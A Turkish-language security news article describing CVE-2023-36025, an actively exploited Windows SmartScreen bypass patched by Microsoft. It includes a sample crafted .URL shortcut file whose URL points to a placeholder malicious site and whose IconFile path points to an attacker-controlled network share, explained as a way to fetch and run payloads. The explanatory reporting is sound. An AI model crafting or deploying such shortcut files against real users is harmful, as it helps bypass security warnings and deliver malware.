Bilgisayar Korsanları Windows SmartScreen Sıfır Gün Güvenlik Açığından Yararlanıyor

Microsoft, Salı Yaması’nın bir parçası olarak, üç sıfır gün güvenlik açığının da yamandığı çok sayıda güvenlik yaması yayınladı. Sıfır gün güvenlik açıklarından biri, Windows SmartScreen işlevini etkileyen CVE-2023-36025’ti.

Bu güvenlik açığına 8,8 (Yüksek) önem derecesi verildi ve tehdit aktörleri tarafından aktif olarak kullanıldı. Bu güvenlik açığının, yetkisiz bir tehdit aktörünün yararlanabileceği ancak başarılı bir şekilde yararlanılabilmesi için kullanıcı etkileşimi gerektiren bir güvenlik atlama güvenlik açığı olduğu bildirildi.

Windows SmartScreen Sıfır Gün Güvenlik Açığı

SmartScreen, güvenilmeyen kaynaklara karşı koruma sağlayarak kullanıcıları potansiyel olarak kötü amaçlı web siteleri ve dosyalar hakkında uyarır.

Bu güvenlik açığı, bir tehdit aktörünün SmartScreen’in güvenlik uyarılarını atlayabilecek özel dosyalar veya köprüler oluşturmasına olanak tanır.

Ancak bu güvenlik açığından yararlanılması, SmartScreen’in düzgün şekilde doğrulamadığı hazırlanmış bir İnternet Kısayol Dosyası (.URL) ile ilişkilendirilmiştir.

Kullanım Kodu Örneği

Bu güvenlik açığından yararlanabilecek hazırlanmış bir dosyayı aşağıda bulabilirsiniz

[InternetShortcut]
URL=malicious-website.com
IDList=
IconFile=\\\\\\\\192.168.1.100\\\\share\\\\icon.ico
IconIndex=1

Dosyadaki URL, kötü amaçlı bir web sitesine işaret eder ve IconFile yolu, tehdit aktörü tarafından kontrol edilen bir ağ konumuna işaret edebilir. Bir tehdit aktörü, bu parametrelerle kötü amaçlı yükleri indirebilir ve bunları savunmasız sistemlerde çalıştırabilir.